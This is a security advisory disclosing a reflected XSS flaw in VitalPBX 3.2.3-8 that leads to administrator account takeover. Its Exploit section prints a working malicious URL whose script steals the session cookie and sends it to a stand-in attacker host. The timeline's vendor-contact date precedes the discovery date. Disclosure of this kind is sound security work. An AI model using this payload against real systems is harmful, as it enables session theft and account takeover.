VitalPBX 3.2.3-8 - Account Takeover via Reflected XSS

Summary

NameVitalPBX 3.2.3-8 - Account Takeover via Reflected XSS
Code name
ProductVitalPBX
Affected versions3.2.3-8
StatePublic
Release date2023-04-10

Vulnerability

KindReflected cross-site scripting (XSS)
Rule
RemoteYes
CVSSv3.1 VectorCVSS:AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSSv3.1 Base Score8.8
Exploit availableNo
CVE ID(s)

Description

VitalPBX version 3.2.3-8 allows an unauthenticated external attacker to obtain the instance's administrator account via a malicious link. This is possible because the application is vulnerable to XSS.

Vulnerability

This vulnerability occurs because the application is vulnerable to XSS.

Exploit

To exploit this vulnerability, we just need to send a malicious url like the following to the administrator.

http://vulnerable.com/?class=<img+src=1+onerror='sid=document.cookie.split(`;`)[0].split(`=`)[1];fetch(`https://attacker.com/vitalpbx/leak?sid=`%2bsid);'>&method=exportCDR&mode=add&refresh_mode=&cdr_filter_id=&source=&destination=&from=2023-01-25%2000%3A00%3A00&to=2023-01-25%2023%3A59%3A59&cdr-report-dt_length=10&format=pdf

The payload, in a more readable format, looks like this.

sid=document.cookie.split(`;`)[0].split(`=`)[1];
fetch(`https://attacker.com/vitalpbx/leak?sid=`+sid);

Evidence of exploitation

ato-reflected-xss

cookie-leak

Our security policy

We have reserved the ID CVE-2023-0486 to refer to this issue from now on.

System Information

  • Version: VitalPBX 3.2.3-8

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://vitalpbx.com/

Timeline

Time-lapse-logo

2023-01-24

Vulnerability discovered.

Time-lapse-logo

2022-01-24

Vendor contacted.

Time-lapse-logo

2023-04-10

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.